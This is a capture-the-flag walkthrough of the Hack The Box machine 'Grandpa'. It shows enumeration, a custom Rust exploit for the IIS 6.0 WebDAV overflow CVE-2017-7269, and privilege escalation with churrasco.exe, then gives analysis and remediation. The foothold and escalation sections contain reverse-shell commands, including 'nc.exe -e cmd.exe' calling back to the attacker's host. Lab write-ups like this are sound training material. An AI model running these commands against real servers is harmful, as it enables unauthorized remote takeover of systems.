Grandpa - HTB Easy Machine
About
Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.
Exploitation
Enumeration
The initial Nmap scan revealed that only port 80 was open, serving a web page via Microsoft-IIS/6.0. This server version, associated with Windows Server 2003, is quite old and often a good indicator of potential vulnerabilities.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Date: Tue, 30 Sep 2025 00:25:49 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsThe Nmap script output also highlighted several enabled HTTP methods, such as PROPFIND, PUT, and MOVE. These methods are part of the WebDAV (Web Distributed Authoring and Versioning) extension, which, if not properly configured, can open up attack vectors for uploading files or manipulating server resources. This was a significant finding to keep in mind.
Navigating to the web page presented a simple "Under Construction" message.
To uncover any hidden content, I ran feroxbuster for directory enumeration. The scan successfully identified two interesting directories: /images/ and /_private/.
feroxbuster -u http://10.10.10.14 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --depth 2 --dont-extract-links -x 404
301 GET 2l 10w 149c http://10.10.10.14/images => http://10.10.10.14/images/
301 GET 2l 10w 149c http://10.10.10.14/Images => http://10.10.10.14/Images/
301 GET 2l 10w 149c http://10.10.10.14/IMAGES => http://10.10.10.14/IMAGES/
403 GET 29l 188w 1529c http://10.10.10.14/_private However, attempting to browse to either directory resulted in a "403 Forbidden" error, indicating I didn't have the necessary permissions to view their contents. A quick check of the page's source code yielded nothing of value.
With directory enumeration hitting a dead end, the most promising path forward was to research known exploits for Microsoft-IIS/6.0. A quick search led to CVE-2017-7269. This is a critical vulnerability related to the WebDAV service the same service hinted at by the PROPFIND method found earlier. It's a stack-based buffer overflow (CWE-121) that can be triggered by a specially crafted PROPFIND request, allowing an unauthenticated attacker to achieve remote code execution.
Foothold
While several public exploits exist for this CVE, I decided to create my own as an opportunity to practice my Rust programming skills. The resulting tool can be found in this repository.
After setting up a Netcat listener, I ran the exploit against the target.
┌── ➤ cve-2017-7269
└─ [master*]$ cargo run -- --rhost 10.10.10.14 --rport 80 --lhost 10.10.16.4 --lport 9001
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.01s
Running `target/debug/cve-2017-7269 --rhost 10.10.10.14 --rport 80 --lhost 10.10.16.4 --lport 9001`
[+] Building shellcode for LHOST=10.10.16.4 LPORT=9001
[+] Building HTTP trigger with shellcode length: 1744
[+] Connecting to target: 10.10.10.14:80
[+] Connection established.
[+] Sending HTTP trigger...
[+] Sending main shellcode...
[+] Payload sent successfully!
[+] Check your listener on 10.10.16.4:9001 for a reverse shell.The exploit worked, and a reverse shell connected back to my listener, granting me access as the nt authority\network service user.
┌── ➤ grandpa
└─ $ nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.10.14 1031
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network serviceThis user account has limited privileges. As expected, attempting to access sensitive directories, such as the Harry user's profile, resulted in an "Access is denied" error. The next step is to find a way to escalate privileges.
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.Privilege Escalation
With a low-privilege shell as network service, the next objective was to escalate to a higher-privileged account. The first step in any Windows privilege escalation scenario is to gather detailed information about the host.
Running systeminfo confirmed the machine was an unpatched Windows Server 2003 (Service Pack 2), which is notoriously full of vulnerabilities.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edi
tion
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 23 Minutes, 57 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 25 Model 1 Stepping 1 AuthenticA
MD ~2445 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 765 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,305 MB
Page File: In Use: 165 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/AA quick registry query also revealed an extremely outdated .NET version.
c:\windows\system32\inetsrv>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v1.1.4322To automate the search for kernel exploits, I saved the systeminfo output and fed it into wesng (Windows Exploit Suggester - Next Generation).
wes --update
wes systeminfo -o systeminfo.csvThe tool returned a long list of potential vulnerabilities. After filtering for exploits that cause "Elevation of Privilege" and affect IIS 6.0 on Service Pack 2, I initially focused on CVE-2009-1122 and CVE-2009-1535. Unfortunately, the available PoCs for these failed to work.
After hitting this dead end, a hint from 0xdf's blog pointed me toward a different exploit: churrasco.exe. This tool leverages CVE-2009-0078, a vulnerability in how Windows handles service isolation. It exploits the fact that processes running under the same service account (like NetworkService) are not properly isolated, allowing a malicious process to access the resources of another and ultimately steal a higher-privileged token, like that of the SYSTEM account.
To execute the plan, I first needed to transfer churrasco.exe and nc.exe to the victim machine. The most straightforward method was to set up an SMB share on my attacker machine using Impacket's smbserver.py.
First, I created a local directory and placed the necessary files inside it.
mkdir smb
cp /usr/share/seclists/Web-Shells/FuzzDB/nc.exe smb/
mv churrasco.exe smb/churrasco.exeNext, I started the SMB server to share the directory's contents.
sudo smbserver.py share smbFrom the victim shell, I navigated to a world-writable directory (C:\wmpub) and copied the files from my share.
C:\wmpub>copy \\10.10.16.4\share\nc.exe nc.exe
copy \\10.10.16.4\share\nc.exe nc.exe
1 file(s) copied.
C:\wmpub>copy \\10.10.16.4\share\churrasco.exe c.exe
copy \\10.10.16.4\share\churrasco.exe c.exe
1 file(s) copied.With the tools in place, I started a new Netcat listener on port 9002 to catch the privileged shell.
┌── ➤ grandpa
└─ $ nc -lvnp 9002
Listening on 0.0.0.0 9002Finally, I executed churrasco.exe, instructing it to run a command that would spawn a new reverse shell back to my machine.
C:\wmpub>.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.16.4 9002"
.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.16.4 9002"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!The exploit succeeded, and a new shell connected back to my listener, this time with full nt authority\system privileges.
┌── ➤ grandpa
└─ $ nc -lvnp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.14 1039
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\systemFrom here, I just needed to go to users directories and get the flags.
USER
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5ec67c3cff....ROOT
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f....Vulnerability Analysis
CVE-2017-7269: Remote Code Execution in IIS 6.0
The initial compromise was possible because the server was running Microsoft IIS 6.0 on Windows Server 2003, a combination that is long past its end-of-life. The enabled WebDAV extension on this version contained a critical, unpatched vulnerability. This allowed an unauthenticated attacker on the network to send a specially crafted PROPFIND request, triggering a buffer overflow and achieving remote code execution.
This exploit is a direct result of CWE-121: Stack-based Buffer Overflow. This weakness occurs when a program writes more data to a buffer located on the stack than is allocated for that buffer. The excess data overwrites adjacent memory, which can corrupt program data, crash the application, or, as in this case, overwrite the instruction pointer to redirect program execution to malicious shellcode provided by the attacker. The overarching issue, however, is CWE-937: Use of Component with Known Vulnerabilities, as the software in use was widely known to be insecure.
CVE-2009-0078: Privilege Escalation via Service Isolation Flaw
After gaining a foothold, privilege escalation to NT AUTHORITY\SYSTEM was achieved by exploiting a local vulnerability in the Windows Server 2003 kernel. The operating system failed to properly isolate processes that were running under the same low-privileged service account (in this case, NETWORK SERVICE). This allowed an exploit (churrasco.exe) to interact with other system processes and steal a high-privilege security token.
This demonstrates CWE-266: Incorrect Privilege Assignment. The vulnerability allowed a process to improperly acquire the permissions and identity of a more privileged process (SYSTEM). Modern operating systems implement stricter security boundaries and process isolation mechanisms specifically to prevent this type of token theft and privilege escalation, highlighting a fundamental design flaw in the legacy OS.
Vulnerability Remediation
Mitigating Remote Code Execution (CVE-2017-7269)
The most effective defense is to decommission legacy systems. Windows Server 2003 and IIS 6.0 are unsupported and should be migrated to a modern, supported platform like Windows Server 2019/2022 and a current version of IIS. Continuing to use end-of-life software exposes an organization to unacceptable risk.
If immediate decommissioning is not possible, apply the principle of least functionality. Disable any unused or non-essential services and components, such as the WebDAV extension, to significantly reduce the server's attack surface. All public-facing systems should be placed behind a properly configured Web Application Firewall (WAF) that can inspect traffic for malicious patterns.
Mitigating Local Privilege Escalation (CVE-2009-0078)
Upgrading the operating system is the only definitive fix for this class of kernel vulnerability. Modern versions of Windows have fundamentally redesigned process isolation and token handling, rendering exploits like churrasco ineffective.
Implement robust endpoint security. An Endpoint Detection and Response (EDR) solution would likely have detected the suspicious activity, such as the dropping of nc.exe and churrasco.exe onto the disk, unusual process execution by a web service account, and the creation of a reverse shell.
Finally, enforce network egress filtering. The privilege escalation attack required establishing a new outbound connection for the reverse shell. A firewall policy that blocks all outbound traffic except for what is explicitly required for business functions can prevent an attacker from establishing command and control, even if they successfully run an exploit.
References
the master 0xdf
windows-iis-60-cve-2017-7269
exploit-db
CVE-2017-7269
churrasco
CWE-266
CWE-121
CWE-937